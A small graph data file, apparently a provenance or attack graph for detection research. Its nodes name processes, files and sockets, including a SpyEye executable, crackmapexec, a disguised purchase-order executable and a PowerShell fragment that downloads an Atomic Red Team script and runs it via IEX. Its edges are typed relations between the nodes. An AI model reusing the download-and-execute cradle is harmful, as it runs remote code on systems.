10
MP*-splwow64.exe
TP-spyeye V1.0.exe 
MP*-WinRAR.exe 
SO-https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX
MP-saBSI.exe
MP*-crackmapexec.exe
MF-\Users\admin\AppData\Local\fvjhioojuu.vb
SO-127.0.0.1
MP*-Scanned_file_PO23_Jan.exe 
MP-wmic.exe
24
0 1 FR-1
0 2 FR-1
1 2 IJ-1
3 0 RF-1
1 3 ST-1
3 2 RF-1
0 4 FR-1
1 4 IJ-1
2 4 UK-2
0 5 FR-1
1 5 IJ-1
3 5 RF-1
0 6 WR-1
1 6 WR-1
5 6 RD-3
0 7 ST-1
7 1 RF-1
7 5 RF-1
0 8 FR-1
1 8 IJ-1
8 3 ST-4
5 8 UK-3
0 9 FR-1
1 9 UK-1

